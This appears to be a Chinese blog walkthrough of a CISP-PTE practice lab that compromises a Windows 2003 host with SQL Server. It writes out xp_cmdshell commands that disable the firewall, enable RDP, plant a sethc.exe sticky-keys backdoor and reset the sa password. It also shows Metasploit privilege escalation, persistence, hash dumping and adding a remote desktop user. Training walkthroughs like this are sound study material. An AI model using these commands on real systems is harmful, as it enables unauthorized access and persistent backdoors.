CISP-PTE-Windows2003教程

为方便后续操作建议和kali在同一网段。
获取到靶机IP后扫描端口1433是sqlserver的

测出用户名admin但是密码爆破失败
扫描目录发现配置文件
配置文件中找到数据库的用户名和密码
使用Microsoft SQL Server Studio连接注意此时不是sa用户
数据库中找到密码成功登录
尝试上传文件但是黑名单限制较死看到里面已经有人上传上去应该是图片上传上去绕过点击下载查看连接密码
拿到服务账户的权限与Users账户的权限相同。想办法远程桌面上去
收集信息查看网络连接情况看到3389没开
windows平台一般都有防火墙netsh firewall show state查看防火墙状态

netsh firewall set opmode mod=disable拒绝访问权限不够关不了
利用数据库操作命令关闭系统防火墙但是咱们不是sa 用户没有权限
而且也没有xp_cmdshell组件权限不够也无法执行上传组件的操作
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Users\Administrator\Desktop\xplog70\xplog70.dll’
拥有sa管理员权限开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell ‘REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
EXEC master.dbo.xp_cmdshell ‘netsh firewall set opmode disable’
EXEC master.dbo.xp_cmdshell ‘cd C:\WINDOWS\system’
EXEC master.dbo.xp_cmdshell ‘copy cmd.exe c:\WINDOWS\system\sethc.exe’
EXEC master.dbo.xp_cmdshell ‘netstat -an’
修改sa密码 exec sp_password NULL, ‘pasw’, ‘sa’
尝试提权

https://www.hacking8.com/mst-sec-lecture-notes/8.html
使用multi/recon/local_exploit_suggeser模块查看靶机可以利用的漏洞以及相应的模块
使用第一个模块尝试target默认windows 7
提权成功
权限维持使用windows/local/persistence模块快速进行权限维持
导出hash值
复制管理员hash拿去解密或者使用john破解
获取到密码后接下来就去开启3389端口远程桌面过去
本来咱们获取到管理员权限后可以直接执行命令但是shell返回不了听说原因有很多
这里使用msf的post/windows/manage/enable_rdp模块开启这个模块好像也可以创新新的远程桌面用户
nmap扫描3389是否开启,或者nc -v ip 端口
使用kali自带的rdesktop或者物理机远程mstsc
之前咱们看到系统有防火墙msf搜索有没有关闭防火墙的模块但是好像没有
post/windows/manage/exec_powershell利用此模块执行powershell命令失败
exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
使用第二个模块重新反弹一个高权限的shell
反弹的shell还是不能进去
看看meterpreter命令有没有可用的点meterpreter命令https://www.cnblogs.com/backlion/p/9484949.html
search -f cmd.exe搜索文件
execute -H -i -f cmd.exe代替shell尝试获取终端权限
可以上传反弹的木马然后利用execute执行反弹回来执行的时候失败太菜
使用vnc,run vnc打开远程桌面失败
查看本地用户组
查看远程桌面用户发现为空

尝试将管理员添加进远程桌面用户组里面
有域控的话倒是可以将用户添加到组里面
run getgui -e可以看到RDP已经启用
run getgui -u admin -p admin添加账号
post/windows/manage/killav模块只能杀防护软件不能搞防火墙
![在这里插入图片描述](https://img-blog.csdnimg.cn/9c70a00a83724dd5试一下post/windows/manage/enable_rdp这个模块能不能添加用户咋们之前看到过
看来还是这个模块强大不仅可以添加用户还可以将用户加到远程桌面组
net localgroup "Remote Desktop Users"看到已经成功将admin用户添加进远程用户组
rdesktop -u admin -p admin 192.168.1.119:3389连接还是失败感觉是防火墙拦了
现在虽然拿到系统权限但是拿不到控制台权限也就无法关闭防火墙。咱们虽然有管理员账号密码但是咱们不能直接去登录靶机要是这样就简单了咱们得用搞远程的方式来搞它
不够好在有数据库可以去拿到数据库sa的密码登录后执行数据库操作继而来关闭防火墙。
爆破sa用户密码但是无数字典过后还是一无所获。
修改远程桌面端口为27689的端口也就是靶机开放的web端口
协议不对应也不行防火墙只开了1433和27689控制台权限拿不了关不了防火墙。sa用户密码爆破不出来系统库中sa的hash也为NULL。
key3:4d9d3q8vadmin:asdadwn_d2112用这些密码登录sa失败。尝试其他模块。
第三个模块windows/local/ms14_070_tcpip_ioctl用来提权到system
第四个exploit/windows/local/ms15_051_client_copy_image也是提权
剩下的几个网上搜了一下也都是提权的 模块看来防火墙终究是关不了还是太菜
meterpreter能获取但是shell获取不到sa密码不知道也爆破不出来防火墙关不掉知道怎么关的师傅还望不吝赐教